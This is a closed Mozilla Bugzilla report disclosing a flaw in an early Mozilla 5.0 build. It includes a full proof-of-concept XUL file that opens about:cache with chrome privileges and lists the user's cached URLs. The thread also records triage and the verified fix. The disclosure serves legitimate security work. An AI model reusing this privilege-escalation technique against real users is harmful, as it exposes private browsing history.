Closed Bug 9806 Opened 25 years ago Closed 25 years ago

Reading user's cache using XUL and window.open()

Categories

(SeaMonkey :: General, defect, P3)

Product:
SeaMonkey
Component:
General
Platform:
x86
Windows 95
Type:
defect

Tracking

(Not tracked)

Status:
VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

References

Details

There is a security vulnerability in Mozilla 5.0 M7 Win95 (guess all platforms),
which allows reading user's cache using XUL and window.open().
The code is:
-----------------------------cache1.xul----------------------------------
<?xml version="1.0"?>
 <!DOCTYPE window>
 <xul:window
   xmlns:html="http://www.w3.org/TR/REC-html40"
   xmlns:xul ="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"
   title = "Reading cache">
 <html:script>
   <![CDATA[

   var a=window.open("about:cache","a","chrome");
   dump("Here are some links from your cache:\n");
   for(i=0;i<10;i++)
    dump(a.document.links[i].href+"\n");
   ]]>
 </html:script>

<!--
<html:iframe type="content-primary" src="about:cache" />
-->

<html:hr/>
<html:h3>
Look at the apprunner console to see some URLs in your cache.
</html:h3>
</xul:window>
-------------------------------------------------------------
Status: NEW → ASSIGNED
QA Contact: leger → dshea
So how do you get this XUL to execute? Install on the user's system?
This XUL may be exectuted from the web - check
http://www.nat.bg/~joro/mozilla/cache1.xul
The web server must have defined the mime type text/xul for .xul files, that is
why I did not post this url in my original post.
Target Milestone: M11
Blocks: 12633
Depends on: 11462
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
My fix for 11462 resolved this as well.
Status: RESOLVED → VERIFIED
Windows NT 1999120208 Comm
JavaScript Error: illegal URL method  about:cache
Product: Browser → Seamonkey
You need to log in before you can comment on or make changes to this bug.